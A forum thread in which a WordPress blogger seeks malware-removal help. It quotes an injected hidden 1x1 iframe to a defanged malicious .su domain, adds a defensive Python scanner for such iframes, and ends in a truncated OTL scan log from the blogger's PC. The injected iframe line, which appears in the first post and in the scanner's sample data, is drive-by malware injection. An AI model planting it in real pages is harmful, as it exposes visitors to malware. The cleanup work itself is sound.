Log analysis and evaluation: WordPress blog infected, mail received from Google (Windows 7)
28.02.2013, 18:38 | #1
Hello everyone, I received a mail from Google saying that my blog is infected. I found a code snippet that looks highly suspicious to me, googled it and got only 4 hits, which sent me here, but unfortunately I can't reply to a thread. This is the snippet: <iframe src="hxxp://sraphicshouldn.su/img2/count.htm" width="1" height="1" frameborder="0"></iframe></div> Should I delete it? Please help quickly, I'm getting desperate.
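A defender-side check for the kind of injection quoted above, added here as an example and not code from the thread or from WordPress: it walks a WordPress file tree and reports every iframe a visitor would never see (1x1 pixel, CSS-hidden or positioned off-screen) with file and line, so that every copy can be found rather than only the one that was noticed. The sample tree it builds is constructed; the footer reuses the defanged snippet from the post, and the example.invalid and YouTube URLs are placeholders.

```python
"""Find hidden <iframe> injections in a WordPress file tree.

Added example for this thread; not code from the original post or from WordPress.
The sample files below are constructed (the footer reuses the snippet quoted in the thread).
"""
import re
import tempfile
from pathlib import Path

IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="value" | name='value' | name=value
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
SCAN_EXTS = {".php", ".html", ".htm", ".js"}


def parse_attrs(attr_text):
    """Lower-cased attribute dict for one tag's attribute text."""
    attrs = {}
    for m in ATTR.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def px(value):
    """Leading integer of a width/height attribute, or None if it is not numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def hidden_reasons(attrs):
    """Why this iframe would be invisible to a visitor (empty list = looks legitimate)."""
    reasons = []
    w, h = px(attrs.get("width")), px(attrs.get("height"))
    if w is not None and h is not None and w <= 1 and h <= 1:
        reasons.append("1x1 pixel")
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("css hidden")
    if re.search(r"(left|top):-\d", style):
        reasons.append("positioned off-screen")
    return reasons


def find_hidden_iframes(text):
    """All hidden iframes in one file's text, with 1-based line numbers."""
    findings = []
    for m in IFRAME_TAG.finditer(text):
        attrs = parse_attrs(m.group(1))
        reasons = hidden_reasons(attrs)
        if reasons:
            findings.append({
                "line": text.count("\n", 0, m.start()) + 1,
                "src": attrs.get("src", ""),
                "reasons": reasons,
            })
    return findings


def scan_tree(root):
    """Walk a WordPress install and report every hidden iframe, file by file."""
    root = Path(root)
    results = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXTS:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for hit in find_hidden_iframes(text):
            results.append({"file": path.relative_to(root).as_posix(), **hit})
    return results


# Constructed sample tree: a footer carrying the snippet from the thread (defanged hxxp://),
# a header with a CSS-hidden variant, and a plugin file with a normal, visible embed.
SAMPLE_FILES = {
    "wp-content/themes/demo/footer.php": (
        "<?php wp_footer(); ?>\n"
        "<div>\n"
        '<iframe src="hxxp://sraphicshouldn.su/img2/count.htm" width="1" height="1" '
        'frameborder="0"></iframe></div>\n'
        "</body></html>\n"
    ),
    "wp-content/themes/demo/header.php": (
        "<html><head>\n"
        '<iframe style="display: none" src="hxxp://example.invalid/c.html"></iframe>\n'
    ),
    "wp-content/plugins/video/embed.php": (
        '<iframe src="https://www.youtube.com/embed/EXAMPLE" width="560" height="315"></iframe>\n'
    ),
}


def build_sample_tree():
    """Write the constructed files into a fresh temporary directory and return its root."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def demo():
    """Scan the constructed tree; returns the findings list (two hits, the embed is not one)."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['file']}:{hit['line']}  src={hit['src']}  ({', '.join(hit['reasons'])})")
```

Point scan_tree at the downloaded copy of the site; anything it reports in a theme, plugin or core file that you did not put there yourself is a candidate for cleanup, and a clean reinstall of core and theme files from the original packages is safer than editing the findings out one by one.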
28.02.2013, 19:10 | #2
Malware-holic | Can you post the link to the blog?
28.02.2013, 19:28 | #3
Hi, yes, gladly. I suspect there is more to it. I have now found a few of these snippets and removed them, but surely that's not all of it.
Drucker Guide » Maintenance Mode is the site; I have put it into maintenance mode.
28.02.2013, 19:33 | #4
Malware-holic | Which WordPress version is in use?
28.02.2013, 19:54 | #5
It is version 3.5.1. By the way, I know nothing about programming and PHP, so noob-level help would be great :-) Thanks for the quick help, my hoster still hasn't answered. When I click on Dashboard in WordPress, strangely nothing is displayed any more; I don't know whether that could be due to maintenance mode... I downloaded the files and scanned them with Spyware Terminator, but it found nothing. I don't even know whether I did that right, please help :-(
28.02.2013, 21:25 | #6
Malware-holic | You can uninstall Spyware Terminator as well. Upload your files from the blog to File-Upload.net and send me the link as a private message. How is the password situation, strong or rather weak? Now let's look at your PC: if you don't have it yet, please download OTL by OldTimer and save it on your desktop.
Code:
activex
netsvcs
msconfig
%SYSTEMDRIVE%\*.
%PROGRAMFILES%\*.exe
%LOCALAPPDATA%\*.exe
%systemroot%\*. /mp /s
C:\Windows\system32\*.tsp
/md5start
userinit.exe
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
ws2ifsl.sys
sceclt.dll
ntelogon.dll
winlogon.exe
logevent.dll
user32.DLL
explorer.exe
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
ahcix86s.sys
/md5stop
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\system32\*.dll /lockedfiles
%USERPROFILE%\*.*
%USERPROFILE%\Local Settings\Temp\*.exe
%USERPROFILE%\Local Settings\Temp\*.dll
%USERPROFILE%\Application Data\*.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs
CREATERESTOREPOINT
28.02.2013, 22:50 | #7
Hi, so here are the scans for now; unfortunately I left Avira open at the bottom right in the taskbar, I hope that's not too bad :/ The scan took forever and could not be cancelled.
[Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\smserial.sys -- (smserial) ========== Standard Registry (SafeList) ========== ========== Internet Explorer ========== IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.asus.com IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?} IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.asus.com IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.eazel.com?id=A8753F0C2B594A0DB594C667F621AFEB IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1 IE - HKCU\..\URLSearchHook: {00000000-6E41-4FD3-8538-502F5495E5FC} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) IE - HKCU\..\URLSearchHook: {16CC3586-3547-4025-9E2F-F04C365D8B90} - No CLSID value found IE - HKCU\..\SearchScopes,DefaultScope = {16CC3586-3547-4025-9E2F-F04C365D8B90} IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?} IE - HKCU\..\SearchScopes\{16CC3586-3547-4025-9E2F-F04C365D8B90}: "URL" = hxxp://search.eazel.com/results.php?cat=web&co=&lg=en&q={searchTerms} IE - HKCU\..\SearchScopes\{171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E}: "URL" = hxxp://websearch.ask.com/redirect?client=ie&tb=AVR-4&o=APN10261&src=crm&q={searchTerms}&locale=de_DE&apn_ptnrs=^AGS&apn_dtid=^YYYYYY^YY^DE&apn_uid=5f7fec2e-bd4e-466c-ac24-ea30a8c3d0b3&apn_sauid=83ED2D56-BCA8-425D-A144-8DEF5DA8B8C7 IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local ========== FireFox ========== FF - 
prefs.js..browser.search.defaultengine: "Ask.com" FF - prefs.js..browser.search.defaultenginename: "Ask.com" FF - prefs.js..browser.search.order.1: "Ask.com" FF - prefs.js..browser.search.selectedEngine: "Ask.com" FF - prefs.js..extensions.enabledAddons: seostatus%40rubyweb:1.5.9 FF - prefs.js..extensions.enabledAddons: %7Bc2b1f3ae-5cd5-49b7-8a0c-2c3bcbbbb294%7D:1.1 FF - prefs.js..extensions.enabledAddons: %7B81BF1D23-5F17-408D-AC6B-BD6DF7CAF670%7D:7.6.0.2 FF - prefs.js..extensions.enabledAddons: %7Bb9db16a4-6edc-47ec-a1f4-b86292ed211d%7D:4.9.14 FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:19.0 FF - prefs.js..keyword.URL: "hxxp://websearch.ask.com/redirect?client=ff&src=kw&tb=AVR-4&o=APN10261&locale=de_DE&apn_uid=5f7fec2e-bd4e-466c-ac24-ea30a8c3d0b3&apn_ptnrs=%5EAGS&apn_sauid=83ED2D56-BCA8-425D-A144-8DEF5DA8B8C7&apn_dtid=%5EYYYYYY%5EYY%5EDE&&q=" FF - user.js - File not found FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_6_602_171.dll () FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll () FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.4: C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{ACAA314B-EEBA-48e4-AD47-84E31C44796C}: C:\Program Files\Common Files\DVDVideoSoft\plugins\ff\ [2012.12.31 16:40:15 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{EBD839AE-B08C-4fb7-859B-F54AF16C159F}: C:\Program Files\EazelBar\Firefox [2013.02.03 14:39:43 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 19.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.20 16:20:59 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 19.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.3\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.02.20 00:21:20 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.3\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 19.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.20 16:20:59 | 000,000,000 | ---D | M] FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 19.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.3\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.02.20 00:21:20 | 000,000,000 | ---D | M] FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.3\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins [2012.11.12 18:13:30 | 000,000,000 | ---D | M] (No name found) -- C:\Users\DBoy\AppData\Roaming\mozilla\Extensions [2013.02.23 17:26:11 | 000,000,000 | ---D | M] (No name found) -- C:\Users\DBoy\AppData\Roaming\mozilla\Firefox\Profiles\v1trl7q1.default\extensions [2012.12.10 22:11:07 | 000,000,000 | ---D | M] (iMacros for Firefox) -- 
C:\Users\DBoy\AppData\Roaming\mozilla\Firefox\Profiles\v1trl7q1.default\extensions\{81BF1D23-5F17-408D-AC6B-BD6DF7CAF670} [2013.02.23 17:26:11 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Users\DBoy\AppData\Roaming\mozilla\Firefox\Profiles\v1trl7q1.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2012.11.17 13:08:12 | 000,207,020 | ---- | M] () (No name found) -- C:\Users\DBoy\AppData\Roaming\mozilla\firefox\profiles\v1trl7q1.default\extensions\seostatus@rubyweb.xpi [2012.12.08 15:56:43 | 000,003,170 | ---- | M] () (No name found) -- C:\Users\DBoy\AppData\Roaming\mozilla\firefox\profiles\v1trl7q1.default\extensions\{c2b1f3ae-5cd5-49b7-8a0c-2c3bcbbbb294}.xpi [2013.02.20 16:20:49 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\mozilla firefox\extensions [2013.02.20 16:20:59 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll [2012.10.24 23:03:12 | 000,001,392 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\amazondotcom-de.xml [2012.10.24 23:03:11 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml [2012.10.24 23:03:12 | 000,001,153 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\eBay-de.xml [2012.10.24 23:03:12 | 000,006,805 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\leo_ende_de.xml [2012.10.24 23:03:12 | 000,001,178 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-de.xml [2012.10.24 23:03:11 | 000,001,105 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-de.xml O1 HOSTS File: ([2006.09.18 22:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O2 - BHO: (EazelBar Helper) - {FE478DC2-E4AD-4197-8F80-5E456BEBC57F} - C:\Program Files\EazelBar\Toolbar32.dll 
() O3 - HKLM\..\Toolbar: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O3 - HKLM\..\Toolbar: (EazelBar) - {EBD839AE-B08C-4fb7-859B-F54AF16C159F} - C:\Program Files\EazelBar\Toolbar32.dll () O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O4 - HKLM..\Run: [] File not found O4 - HKLM..\Run: [ADSMTray] C:\Program Files\ASUS\ASUS Data Security Manager\ADSMTray.exe (ASUSTek Computer Inc.) O4 - HKLM..\Run: [ApnUpdater] C:\Program Files\Ask.com\Updater\Updater.exe (Ask) O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.) O4 - HKLM..\Run: [ASUS Camera ScreenSaver] C:\Windows\AsScrProlog.exe () O4 - HKLM..\Run: [ASUS Screen Saver Protector] C:\Windows\ASScrPro.exe () O4 - HKLM..\Run: [ASUSTPE] C:\Windows\System32\ASUSTPE.exe (ASUS) O4 - HKLM..\Run: [ATKMEDIA] C:\Program Files\ASUS\ATK Media\DMedia.exe (ASUS) O4 - HKLM..\Run: [ATKOSD2] C:\Program Files\ASUS\ATKOSD2\ATKOSD2.exe (ASUS) O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG) O4 - HKLM..\Run: [RtHDVCpl] C:\Windows\RtHDVCpl.exe (Realtek Semiconductor) O4 - HKLM..\Run: [Samsung PanelMgr] C:\Windows\Samsung\PanelMgr\SSMMgr.exe () O4 - HKLM..\Run: [SpywareTerminatorShield] C:\Program Files\Spyware Terminator\SpywareTerminatorShield.exe (Crawler.com) O4 - HKLM..\Run: [SpywareTerminatorUpdater] C:\Program Files\Spyware Terminator\SpywareTerminatorUpdate.exe (Crawler.com) O4 - HKLM..\Run: [StartCCC] C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe (Advanced Micro Devices, Inc.) 
O4 - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation) O4 - HKLM..\Run: [Zshutdown] c:\Preload\patch\sysprep.cmd File not found O8 - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\DBoy\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm () O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.) O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000003 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000004 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000005 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000006 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000007 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000008 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. KG) O10 - Protocol_Catalog9\Catalog_Entries\000000000020 - C:\Program Files\Avira\AntiVir Desktop\avsda.dll (Avira Operations GmbH & Co. 
KG) O13 - gopher Prefix: missing O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.0.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D28BF24E-DC37-418C-A805-E3550CD0B445}: DhcpNameServer = 192.168.0.1 O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL (Skype Technologies) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation) O24 - Desktop WallPaper: C:\Windows\ASUS\wallpapers\ASUS.jpg O24 - Desktop BackupWallPaper: C:\Windows\ASUS\wallpapers\ASUS.jpg O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2006.09.18 22:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O34 - HKLM BootExecute: (autocheck autochk *) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 11.0 ActiveX: {25FFAAD0-F4A3-4164-95FF-4461E9F35D51} - .NET Framework ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help 
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6 ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7 ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\system32\ie4uinit.exe -BaseSettings ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1 ActiveX: {D27CDB6E-AE6D-11CF-96B8-444553540000} - Adobe Flash Player 9 ActiveX ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\Windows\system32\unregmp2.exe /ShowWMP ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\system32\ie4uinit.exe -UserIconConfig ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP NetSvcs: FastUserSwitchingCompatibility - File not found NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation) NetSvcs: Nla - File not found NetSvcs: Ntmssvc - File not found NetSvcs: NWCWorkstation - File not found NetSvcs: Nwsapagent - File not found NetSvcs: SRService - File not found NetSvcs: WmdmPmSp - File not found NetSvcs: LogonHours - File not found NetSvcs: PCAudit - File not found NetSvcs: helpsvc - File not found 
NetSvcs: uploadmgr - File not found CREATERESTOREPOINT Restore point Set: OTL Restore Point ========== Files/Folders - Created Within 30 Days ========== [2013.02.28 21:32:04 | 000,000,000 | ---D | C] -- C:\Users\DBoy\Desktop\dateien [2013.02.28 21:28:29 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\DBoy\Desktop\OTL.exe [2013.02.28 18:42:11 | 000,000,000 | ---D | C] -- C:\Users\DBoy\AppData\Roaming\Spyware Terminator [2013.02.28 18:42:11 | 000,000,000 | ---D | C] -- C:\ProgramData\Spyware Terminator [2013.02.28 18:42:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spyware Terminator 2012 [2013.02.28 18:41:26 | 000,000,000 | ---D | C] -- C:\Program Files\Spyware Terminator [2013.02.28 18:40:45 | 000,937,224 | ---- | C] (Crawler.com ) -- C:\Users\DBoy\Desktop\SpywareTerminator30074Setup.exe [2013.02.22 15:07:24 | 000,000,000 | ---D | C] -- C:\Program Files\TeamViewer [2013.02.22 14:42:44 | 005,845,208 | ---- | C] (TeamViewer GmbH) -- C:\Users\DBoy\Desktop\TeamViewer_Setup_de.exe [2013.02.20 16:20:48 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox [2013.02.20 00:21:20 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Thunderbird [2013.02.03 15:04:30 | 000,000,000 | ---D | C] -- C:\Program Files\MSXML 4.0 [2013.02.03 14:49:57 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Printers [2013.02.03 14:46:40 | 000,217,600 | ---- | C] (SEC) -- C:\Windows\System32\SIPDUtil.dll [2013.02.03 14:46:40 | 000,137,384 | ---- | C] (Samsung Electronics CO., LTD.) -- C:\Windows\System32\SUPDSvcA.dll [2013.02.03 14:46:40 | 000,127,656 | ---- | C] (Samsung Electronics CO., LTD.) 
-- C:\Windows\System32\SUPDSvc.exe [2013.02.03 14:46:39 | 000,151,552 | ---- | C] (SS) -- C:\Windows\System32\spd__ci.exe [2013.02.03 14:46:39 | 000,065,536 | ---- | C] (SS) -- C:\Windows\System32\spd__ci.dll [2013.02.03 14:46:30 | 000,005,120 | ---- | C] (Samsung Electronics) -- C:\Windows\System32\drivers\SSPORT.SYS [2013.02.03 14:46:29 | 000,000,000 | ---D | C] -- C:\Program Files\Samsung [2013.02.03 14:46:19 | 000,000,000 | ---D | C] -- C:\Temp [2013.02.03 14:45:06 | 027,283,025 | ---- | C] (Samsung ) -- C:\Users\DBoy\Desktop\SamsungUniversalPrintDriver.exe [2013.02.03 14:41:17 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\SWF Studio [2013.02.03 14:40:47 | 000,000,000 | ---D | C] -- C:\Windows\Samsung [2013.02.03 14:39:43 | 000,000,000 | ---D | C] -- C:\Program Files\EazelBar [2 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] ========== Files - Modified Within 30 Days ========== [2013.02.28 21:53:26 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 [2013.02.28 21:53:26 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 [2013.02.28 21:53:11 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2013.02.28 21:53:01 | 3220,463,616 | -HS- | M] () -- C:\hiberfil.sys [2013.02.28 21:52:03 | 000,000,012 | ---- | M] () -- C:\Windows\bthservsdp.dat [2013.02.28 21:28:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\DBoy\Desktop\OTL.exe [2013.02.28 21:13:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job [2013.02.28 20:00:15 | 000,000,416 | -H-- | M] () -- C:\Windows\tasks\User_Feed_Synchronization-{DA6E10C5-8C26-4239-930B-F93C091E7ABE}.job [2013.02.28 18:55:59 | 175,072,145 | ---- | M] () -- C:\Windows\MEMORY.DMP [2013.02.28 18:42:10 | 000,000,854 | ---- | M] () -- C:\Users\Public\Desktop\Spyware Terminator 2012.lnk [2013.02.28 18:40:46 | 000,937,224 | ---- | 
M] (Crawler.com ) -- C:\Users\DBoy\Desktop\SpywareTerminator30074Setup.exe [2013.02.25 18:36:58 | 000,014,927 | ---- | M] () -- C:\Users\DBoy\Desktop\info-button.png [2013.02.25 18:24:11 | 000,005,908 | ---- | M] () -- C:\Users\DBoy\Desktop\airptint.abw [2013.02.23 15:37:05 | 000,110,219 | ---- | M] () -- C:\Users\DBoy\Desktop\button.jpg [2013.02.22 16:28:10 | 000,229,672 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT [2013.02.22 15:07:28 | 000,000,962 | ---- | M] () -- C:\Users\Public\Desktop\TeamViewer 8.lnk [2013.02.22 14:42:45 | 005,845,208 | ---- | M] (TeamViewer GmbH) -- C:\Users\DBoy\Desktop\TeamViewer_Setup_de.exe [2013.02.22 13:10:07 | 000,124,839 | ---- | M] () -- C:\Users\DBoy\Desktop\j.jpg [2013.02.22 13:09:39 | 000,177,632 | ---- | M] () -- C:\Users\DBoy\Desktop\l.jpg [2013.02.17 18:01:30 | 000,004,334 | ---- | M] () -- C:\Users\DBoy\Desktop\Ultrasport-Power-Stepper-mit-Handpuls-Sensoren-silber.jpg [2013.02.10 